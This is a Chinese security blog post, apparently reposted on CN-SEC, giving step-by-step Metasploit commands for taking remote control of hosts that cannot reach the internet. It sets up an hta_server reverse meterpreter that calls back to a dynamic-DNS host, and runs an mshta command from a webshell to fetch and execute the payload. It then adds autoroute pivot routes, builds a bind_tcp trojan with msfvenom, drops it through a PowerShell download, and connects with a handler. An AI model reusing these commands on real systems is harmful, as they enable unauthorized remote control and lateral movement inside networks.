【远控使用】metaslpoit不出网上线

admin 2022年1月10日03:33:10安全博客评论8 views874字阅读2分54秒阅读模式

hta_server模块使用

1
2
3
4
5
6
7
use exploit/windows/misc/hta_server
set target 1
set payload windows/x64/meterpreter/reverse_tcp
set SRVPORT 80
set lhost ad39402345.wicp.vip
set lport 26240
run

image-20210908142347303

接着在webshell中执行来web传递

1
mshta http://ad39402345.wicp.vip/Q2Uo0sNe.hta

image-20210908142453263

接着用来添加路由

1
2
3
4
run get_local_subnets
run autoroute -s 192.168.186.0/255.255.255.0
run autoroute -d -s 192.168.186.0
bg

然后在该联网主机上建立web传递

image-20210908150023721

再用断网主机访问mshta就行了

Proxychains实现bind连接

接着上面的加一个proxy

生成一个木马

1
msfvenom -p windows/x64/meterpreter/bind_tcp lport=443 -f exe > bind.exe

利用webshell上传

image-20210908154010042

接着用不出网的主机powershell下载这个bind.exe

1
2
$client = new-object System.Net.WebClient
$client.DownloadFile('http://10.0.1.4/payload.exe','C:/test.exe')

接着执行就可以发现443开始监听了

image-20210908154836794

接着bind连接进去

1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.186.4
set lport 443
exploit

image-20210908154903887

远程连接命令mstsc(microsoft terminal server client)

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【远控使用】metaslpoit不出网上线 http://cn-sec.com/archives/730012.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: